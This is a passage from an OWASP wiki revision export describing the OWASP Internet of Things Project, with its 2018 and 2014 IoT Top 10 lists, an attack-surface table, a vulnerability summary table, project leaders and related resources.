Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:2014_2018Mapping.png&diff=250072File:2014 2018Mapping.png2019-04-12T20:23:08Z<p>Aaron.guzman: </p>
<hr />
<div>2014_2018 mapping</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:2014_2018Mapping.png&diff=250071File:2014 2018Mapping.png2019-04-12T20:06:29Z<p>Aaron.guzman: </p>
<hr />
<div>2014 2018 mapping</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=249918OWASP Internet of Things Project2019-04-10T01:23:54Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. Typically, lists have shortcomings that are unable to cover each aspect of an IoT environment. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. Typically, lists have shortcomings that are unable to cover each aspect of an IoT environment. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. Typically, lists have shortcomings that are unable to cover each aspect of an IoT environment. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. <br />
<br />
{{Social Media Links}}<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
